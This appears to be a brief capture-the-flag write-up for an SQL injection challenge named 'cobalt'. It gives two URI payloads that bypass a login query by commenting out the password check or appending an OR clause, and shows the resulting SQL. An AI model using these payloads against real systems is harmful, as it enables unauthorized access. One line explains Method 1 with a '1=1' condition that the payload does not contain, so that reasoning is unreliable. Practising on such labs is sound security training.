cobalt

We are provided with the SQL query:

SELECT id FROM prob_cobolt WHERE id='{$_GET[id]}' AND pw=md5('{$_GET[pw]}')`

This time the application requires us to query for the id admin.

Method 1

In order to make the result of this query True, we can provide the following URI parameter:

?id=admin' -- -

The resultant query then becomes:

SELECT id FROM prob_cobalt WHERE id='admin' -- -' AND pw=md5('')

## Queried part:
SELECT id FROM prob_cobalt WHERE id='admin'

## Commented part:
AND pw=md5('')

Since 1=1 is always true, the result of the OR operation will always be True.

Method 2

We can also make teh statement true using the following URI parameter:

?pw=') OR (id='admin

The resultant query will be:

SELECT id FROM prob_cobalt WHERE id='admin' AND pw=md5('') OR (id='admin')